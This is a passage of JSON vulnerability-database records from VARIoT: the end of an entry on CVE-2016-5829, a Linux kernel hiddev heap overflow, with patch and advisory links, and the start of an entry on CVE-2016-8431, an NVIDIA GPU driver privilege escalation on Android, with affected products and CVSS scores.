        "id": "138539"
      },
      {
        "db": "PACKETSTORM",
        "id": "138540"
      },
      {
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "db": "PACKETSTORM",
        "id": "139502"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "id": "VAR-201606-0329",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.4043553933333333
  },
  "last_update_date": "2024-07-23T21:36:28.630000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HID: hiddev: validate num_values for HIDIOCGUSAGES, HIDIOCSUSAGES commands",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/93a2001bdfd5376c3dc2158653034c20392d15c5"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "HID: hiddev: validate num_values for HIDIOCGUSAGES, HIDIOCSUSAGES commands",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=93a2001bdfd5376c3dc2158653034c20392d15c5"
      },
      {
        "title": "Linux kernel Fixes for heap-based buffer overflow vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=62507"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162006 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3072-1"
      },
      {
        "title": "Red Hat: CVE-2016-5829",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-5829"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3072-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3071-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3071-2"
      },
      {
        "title": "Ubuntu Security Notice: linux-raspi2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3070-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3070-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3070-3"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-xenial vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3070-4"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20162574 - security advisory"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf"
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=93a2001bdfd5376c3dc2158653034c20392d15c5"
      },
      {
        "trust": 2.0,
        "url": "http://www.ubuntu.com/usn/usn-3070-1"
      },
      {
        "trust": 1.9,
        "url": "http://www.ubuntu.com/usn/usn-3072-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-3072-2"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-3070-3"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/91450"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-3070-4"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2574.html"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/93a2001bdfd5376c3dc2158653034c20392d15c5"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2016/06/26/2"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2016/dsa-3616"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00000.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-3071-1"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00049.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00054.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00052.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-3070-2"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00051.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00007.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00055.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00053.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00048.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00050.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00044.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00027.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-3071-2"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2584.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2006.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5829"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5829"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5829"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5244"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5696"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5828"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/oss-sec/2016/q2/608"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux.org/"
      },
      {
        "trust": 0.3,
        "url": "https://support.f5.com/kb/en-us/solutions/public/k/28/sol28056114.html?sr=59127107"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5728"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6197"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1237"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5400"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2016:2006"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/3072-1/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-xenial/4.4.0-36.55~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.2.0-109.150"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/3.2.0-1487.114"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-36.55"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1024.27"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8845"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8844"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2117"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6327"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8374"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8956"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6198"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3156"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2069"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3699"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4581"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8374"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5412"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2847"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8812"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4569"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8845"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8956"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6480"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6327"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4581"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5828"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4794"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2069"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2013-4312"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4578"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.3_release_notes/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8812"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4312"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4578"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2847"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3070"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8746"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6198"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2384"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8844"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2053"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6136"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4569"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4794"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3699"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2117"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6480"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2384"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5412"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3156"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-8543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5829"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8543"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3070"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "db": "PACKETSTORM",
        "id": "138539"
      },
      {
        "db": "PACKETSTORM",
        "id": "138540"
      },
      {
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "db": "PACKETSTORM",
        "id": "139502"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "db": "PACKETSTORM",
        "id": "138539"
      },
      {
        "db": "PACKETSTORM",
        "id": "138540"
      },
      {
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "db": "PACKETSTORM",
        "id": "139502"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-06-27T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "date": "2016-06-25T00:00:00",
        "db": "BID",
        "id": "91450"
      },
      {
        "date": "2016-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "date": "2016-08-30T18:22:00",
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "date": "2016-08-29T20:16:01",
        "db": "PACKETSTORM",
        "id": "138539"
      },
      {
        "date": "2016-08-29T20:16:08",
        "db": "PACKETSTORM",
        "id": "138540"
      },
      {
        "date": "2016-08-29T20:15:36",
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "date": "2016-08-30T18:19:00",
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "date": "2016-11-03T10:12:00",
        "db": "PACKETSTORM",
        "id": "139502"
      },
      {
        "date": "2016-06-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "date": "2016-06-27T10:59:14.393000",
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5829"
      },
      {
        "date": "2017-03-07T04:02:00",
        "db": "BID",
        "id": "91450"
      },
      {
        "date": "2016-06-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      },
      {
        "date": "2023-01-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      },
      {
        "date": "2023-01-17T21:16:08.307000",
        "db": "NVD",
        "id": "CVE-2016-5829"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "91450"
      },
      {
        "db": "PACKETSTORM",
        "id": "138556"
      },
      {
        "db": "PACKETSTORM",
        "id": "138536"
      },
      {
        "db": "PACKETSTORM",
        "id": "138555"
      },
      {
        "db": "PACKETSTORM",
        "id": "139502"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      }
    ],
    "trust": 1.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  drivers/hid/usbhid/hiddev.c of  hiddev_ioctl_usage Heap-based buffer overflow vulnerability in functions",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-003343"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201606-598"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0102
Vulnerability from variot

An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.18. Android ID: A-32402179. References: N-CVE-2016-8431. GooglePixelC is a tablet from Google Inc. in the United States. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402179 and A-32447738

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0102",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel c",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00176"
      },
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006803"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8431"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Yuan-Tsung Lo, Tong Lin, Chiachih Wu and Xuxian Jiang of C0RE Team.",
    "sources": [
      {
        "db": "BID",
        "id": "95236"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-051"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8431",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8431",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00176",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8431",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
